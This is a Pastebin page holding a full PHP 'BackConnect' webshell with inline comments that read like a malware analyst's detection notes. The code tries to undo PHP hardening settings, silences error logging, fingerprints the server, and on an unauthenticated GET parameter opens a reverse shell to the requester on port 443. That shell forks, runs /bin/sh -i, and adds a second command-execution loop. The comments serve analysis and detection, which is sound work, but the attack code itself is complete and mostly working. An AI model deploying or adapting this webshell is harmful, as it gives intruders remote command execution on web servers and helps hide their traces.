PhpBc1.php Exploit Sh3LL BackConnect Code

Nov 30th, 2017
140
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.09 KB | None | 0 0
<?
// Short open tag (`<?`, not `<?php`): this block only runs where short_open_tag is on.
//
// Hardening-bypass attempt: ini_restore() resets a directive to its php.ini value.
// The directives below are system/per-directory settings, and safe_mode no longer
// exists (removed in PHP 5.4), so on a current engine this is a no-op. It is a
// leftover of the old ini_restore() open_basedir/safe_mode reset bug (fixed in the
// PHP 5.2-era releases) and is a strong webshell indicator on its own.
@ini_restore("safe_mode");
@ini_restore("open_basedir");
@ini_restore("safe_mode_include_dir");
@ini_restore("safe_mode_exec_dir");
@ini_restore("disable_functions");
@ini_restore("allow_url_fopen");

// Anti-forensics: turn off error logging so failures of the later calls
// (fsockopen, proc_open, pcntl_fork ...) leave nothing in the PHP error log.
// Combined with the `@` suppression above, the script is designed to fail silently.
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
?>
<?
// Recon probe: print safe_mode / open_basedir before and after a second
// (unsuppressed) ini_restore(), so the operator can see whether the reset took.
// Output lands before the <!DOCTYPE>, i.e. at the very top of the response body.
echo ini_get("safe_mode");
echo ini_get("open_basedir");
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
?>
  20. <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
  21. <HTML>
  22. <HEAD>
  23. <meta http-equiv=Content-Type content="text/html; charset=windows-1254">
  24. </HEAD>
  25. <BODY>
  26. <CENTER>
<?php
// Host fingerprint: OS, hostname, kernel release/version, arch (php_uname() with
// no mode argument). Echoed unescaped into the page body.
$uname = php_uname();
echo "Uname -a :$uname";
?>
<br><br>
<!-- Triggers for the two back-connect modes below. Both are plain GET links
     (?BackConnect=PHP_1 / PHP_2); there is no authentication, secret or token
     anywhere in this file, so anyone who can reach the URL can fire them. -->
<a href="?BackConnect=PHP_1">PHP BackConnect 1</a>
&nbsp;&nbsp; <a href="?BackConnect=PHP_2">PHP BackConnect 2</a>
<?php
// Prints $string followed by a newline unless $daemon is set.
//
// NOTE(review): $daemon is read as a function-local variable; there is no
// `global $daemon` and no parameter, so it is always undefined here (notice) and
// `!$daemon` is always true. The "stay quiet once daemonised" intent never works:
// every message is printed regardless of the global $daemon set later in the file.
function printit ($string) {
if (!$daemon) {
print "$string\n";
}
}
// Dispatch on an unauthenticated GET parameter. Neither mode checks who the
// caller is: the "target" of the connect-back is simply whoever requested the page.
$bc = $_GET["BackConnect"];
switch($bc){
case "PHP_1":

// Mode 1: connect-back shell. Apart from $ip/$port being hard-wired, this appears
// to be the widely circulated pentestmonkey php-reverse-shell (same variable
// names, $VERSION = "1.0" and comment text) - worth matching on for detection.
set_time_limit (0);
$VERSION = "1.0";
// Connects back to the requesting client's address on TCP/443. No ssl:// prefix
// is used (see fsockopen below), so this is a plaintext shell session on port 443,
// not TLS - an egress/IDS rule for non-TLS traffic to 443 from the web server
// user would catch it.
$ip = $_SERVER["REMOTE_ADDR"];
$port = 443;
$chunk_size = 1400;
$write_a = null;
$error_a = null;
// Command handed to proc_open: fingerprint, logged-in users, identity, then an
// interactive /bin/sh whose stdio is bridged to the socket.
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
// Detach from the web server worker when the pcntl extension is available:
// the parent (request handler) exits and the forked child carries the shell.
if (function_exists('pcntl_fork')) {

$pid = pcntl_fork();

if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}

if ($pid) {
exit(0); // Parent exits
}
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}

// Set in global scope only; printit() never sees it (see its definition above).
$daemon = 1;
} else {
print("WARNING: Failed to daemonise. This is quite common and not fatal.");
}

// Change to a safe directory
chdir("/");

// Remove any umask we inherited
// umask(0) means anything the spawned shell creates is world-readable/-writable
// unless the creating command sets its own mode - a useful forensic artefact.
umask(0);

//
// Do the reverse shell...
//

// Open reverse connection
// Plain TCP (no ssl:// scheme), 30 s connect timeout.
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}

// Spawn shell process
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);

// The shell runs as the web server user with the worker's environment; on a
// host this shows up as /bin/sh -i whose parent is the PHP/httpd process.
$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}

// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

// Relay loop: socket -> shell stdin, shell stdout/stderr -> socket, until either
// side closes. stream_select() is called with a null timeout, so the worker (or
// the forked child) blocks here for as long as the session lasts.
while (1) {
// Check for end of TCP connection
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}

// Check for end of STDOUT
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}

// Wait until a command is end down $sock, or some
// command output is available on STDOUT or STDERR
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

// If we can read from the TCP socket, send
// data to process's STDIN
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}

// If we can read from the process's STDOUT
// send data down tcp connection
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}

// If we can read from the process's STDERR
// send data down tcp connection
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
// (The two lines above are the orphaned header comment of printit(); in the
// original script they sit directly above that function.)
break;
case "PHP_2":
// Mode 2: line-oriented command loop. Same connect-back target (requester's IP,
// TCP/443, plaintext). Note `<>` is PHP's `!=`; REMOTE_ADDR is essentially never
// empty, so the guard is cosmetic.
$ipim=$_SERVER["REMOTE_ADDR"];
$portum="443";
if ($ipim <> "")
{
$mucx=fsockopen($ipim , $portum , $errno, $errstr );
if (!$mucx){
$result = "Error: didnt connect !!!";
}
else {

$zamazing0="\n";
// Banner string is a handy static signature for this variant.
fputs ($mucx ,"\nwelcome KingSkrupellos\n\n");
// system() echoes full command output into the HTTP response and returns only
// the last output line, so the remote side receives just that last line.
fputs($mucx , system("uname -a") .$zamazing0 );
fputs($mucx , system("pwd") .$zamazing0 );
fputs($mucx , system("id") .$zamazing0.$zamazing0 );
while(!feof($mucx)){
// fputs() with a single argument is missing its required $data parameter:
// a warning/NULL on PHP 7.x, an ArgumentCountError (uncaught, loop aborts) on
// PHP 8 - this mode is effectively dead on current engines.
fputs ($mucx);
$one="[$";
$two="]";
// Reads one line (up to 8191 bytes, newline included) from the socket and runs
// it verbatim through the shell via the backtick operator; the trailing newline
// from fgets() is passed along with it.
$result= fgets ($mucx, 8192);
$message=`$result`;
fputs ($mucx, $one. system("whoami") .$two. " " .$message."\n");
}
fclose ($mucx);
}
}

break;

}
?>
  203. </CENTER>
  204. </BODY>
  205. </HTML>